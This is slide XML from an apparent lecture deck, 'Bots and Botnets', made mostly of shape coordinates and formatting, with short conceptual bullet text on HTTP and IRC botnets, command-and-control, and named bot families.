                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="441706" y="124206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294513" y="84836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284607" y="121539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="161036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441706" y="124206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="699389" y="193167"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="552069" y="153797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542290" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689483" y="229997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699389" y="193167"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="956945" y="262128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="809752" y="222758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799846" y="259461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947166" y="298958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956945" y="262128"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="1214628" y="331089"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1067435" y="291719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057529" y="328549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204722" y="367919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214628" y="331089"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="3659124" y="427482"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3654298" y="389636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559035" y="401828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554222" y="364109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448050" y="435229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568700" y="477393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564178" y="442087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3563874" y="439674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659124" y="427482"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="3923665" y="393700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3918839" y="355854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3767582" y="375158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3772535" y="413004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3923665" y="393700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="4188206" y="359791"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4183380" y="322072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032250" y="341376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4037076" y="379095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4188206" y="359791"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="4452747" y="326009"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4447921" y="288163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296791" y="307594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4301617" y="345313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4452747" y="326009"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4717415" h="477519">
                  <a:moveTo>
                    <a:pt x="4717288" y="292227"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4712462" y="254381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4561319" y="273685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4566145" y="311531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4717288" y="2922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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="600075" y="3409950"/>
              <a:ext cx="2228850" cy="695325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2228850" h="695325">
                  <a:moveTo>
                    <a:pt x="2112899" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="115887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70776" y="9116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33940" y="33972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9106" y="70830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="115950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="579374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9106" y="624494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33940" y="661352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70776" y="686208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115887" y="695325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2112899" y="695325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158019" y="686208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194877" y="661352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219733" y="624494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228850" y="579374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228850" y="115950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219733" y="70830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194877" y="33972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158019" y="9116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2112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p/>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="600075" y="3409950"/>
              <a:ext cx="2228850" cy="695325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2228850" h="695325">
                  <a:moveTo>
                    <a:pt x="0" y="115950"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9106" y="70830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33940" y="33972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70776" y="9116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115887" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2112899" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158019" y="9116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194877" y="33972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219733" y="70830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228850" y="115950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228850" y="579374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219733" y="624494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194877" y="661352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158019" y="686208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2112899" y="695325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115887" y="695325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70776" y="686208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33940" y="661352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9106" y="624494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="579374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1159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p/>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="object 15"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId23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5936243" y="4874268"/>
            <a:ext cx="946676" cy="782870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId25"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104390" y="3409315"/>
            <a:ext cx="2237105" cy="699135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p>
            <a:pPr marL="338455" marR="5080" indent="-32639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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-6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Post</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1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Command </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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1600" b="1" spc="-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C&amp;C </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-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URL</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" spc="-25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object 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId26"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3633343" y="2180843"/>
            <a:ext cx="4634865" cy="1038860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="156972" y="500380"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10414" y="458343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="494919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146431" y="536956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156972" y="500380"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="413258" y="573913"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266827" y="531876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256286" y="568452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402844" y="610489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413258" y="573913"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="669671" y="647446"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="523240" y="605409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512699" y="641985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="659130" y="684022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669671" y="647446"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="926084" y="720979"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="779526" y="678942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768985" y="715518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915543" y="757555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926084" y="720979"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="1233932" y="829056"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1225219" y="821055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1139825" y="742569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129309" y="779246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035939" y="752475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1025398" y="789051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118819" y="815809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108329" y="852424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233932" y="829056"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="1934210" y="267335"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1896110" y="266700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1893570" y="419100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1931670" y="419735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1934210" y="267335"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="1938782" y="762"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1900682" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1898142" y="152400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936242" y="153035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1938782" y="762"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="1969262" y="449072"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1854962" y="447040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1910207" y="562356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1969262" y="449072"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="3559175" y="1023239"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3555365" y="985266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3403727" y="1000633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3407537" y="1038479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3559175" y="1023239"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="3824478" y="996442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3820668" y="958596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3669030" y="973836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3672840" y="1011809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3824478" y="996442"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="4089908" y="969772"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4086098" y="931799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3934460" y="947166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3938270" y="985012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4089908" y="969772"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="4355211" y="942975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4351401" y="905129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4199763" y="920369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203573" y="958342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4355211" y="942975"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4634865" h="1038860">
                <a:moveTo>
                  <a:pt x="4634357" y="895731"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4609643" y="886333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4514850" y="850265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4518698" y="888238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465180" y="893572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4469003" y="931545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4522546" y="926109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4526407" y="964057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4634357" y="8957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What is a Botnet?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0995" y="1022350"/>
            <a:ext cx="2965450" cy="4959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HTTP Botnets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5098415" y="1098550"/>
            <a:ext cx="6660515" cy="1169035"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9805"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202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33020" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="4204335" algn="l"/>
              </a:tabLst>
            </a:pP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Botherders are shifting to HTTP-based botnets that serve a single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26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purpose.</a:t>
            </a:r>
            <a:endParaRPr sz="2600" b="1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6" name="object 2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340995" y="2178685"/>
            <a:ext cx="11128375" cy="4264660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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4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Benefits of HTTP to botherder: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Also very robust with freely available server software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HTTP acts as a “covert channel” for a botherder’s traffic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Web application technologies help botherders get organized.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4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Drawbacks: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Still a Centralized server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Easy for researchers to analyze.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4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Recent HTTP Bots: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Zunker (Zupacha): Spam bot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BlackEnergy: DDoS bot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-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="917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60850" y="2934653"/>
            <a:ext cx="7908925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500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BF191A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bots and Botnets </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BF191A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="日期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E7442A-BA00-4274-AC47-95D95C23D1C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707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E13747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19" name="文本占位符 3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89843" y="3127425"/>
            <a:ext cx="2157413" cy="1695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rPr>
              <a:t>01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20" name="文本占位符 3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289843" y="2729084"/>
            <a:ext cx="2157413" cy="52363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rPr>
              <a:t>Part One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52199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="L 形 21"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4663956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3" name="L 形 22"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4818077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4" name="L 形 23"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4972199" y="6008864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25" name="直角三角形 24"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D120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>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="E13747"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="E13747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>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="E13747"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="E13747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What Bots can do?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0995" y="1022350"/>
            <a:ext cx="3879850" cy="4959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/>
            <a:r>
              <a:rPr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Zombie/drone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object 3" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234377d220a7d0a"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226060" y="1449705"/>
            <a:ext cx="11739880" cy="30086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p>
            <a:pPr marL="239395" indent="-227330">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1180"/>
              </a:spcBef>
              <a:buSzPct val="200000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="23939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3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bot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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3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sz="3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sz="3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sz="3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3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10" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victims</a:t>
            </a:r>
            <a:endParaRPr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6305" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="965"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
              <a:tabLst>
                <a:tab pos="732790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="28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endParaRPr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58595" indent="-457200" defTabSz="914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
              <a:tabLst>
                <a:tab pos="1266825" algn="l"/>
              </a:tabLst>
            </a:pP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Each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-4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bot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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contains</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800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hard-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coded</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800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list</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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IRC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-4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servers’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-1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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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names</a:t>
            </a:r>
            <a:endParaRPr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458595" marR="5080" indent="-457200" defTabSz="914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
              <a:tabLst>
                <a:tab pos="1266825" algn="l"/>
              </a:tabLst>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-4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infection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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spreading,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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IRC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-3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servers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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sz="2800" spc="-2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channels</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-1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sz="2800" spc="-2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800" spc="-3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new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-4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bots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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-4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looking for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-1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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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often</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-2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longer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="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reachable</a:t>
            </a:r>
            <a:endParaRPr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6305" lvl="1" indent="-457200" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/>
              <a:tabLst>
                <a:tab pos="732790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="28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command:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="28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sz="28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28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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="28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800" b="1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/16</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="28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prefixes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58595" indent="-457200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Ø"/>
              <a:tabLst>
                <a:tab pos="1266825" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4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Botmasters share information about prefixes to avoid</a:t>
            </a:r>
            <a:endParaRPr sz="2600" spc="-1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Botnets used for?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0995" y="1022350"/>
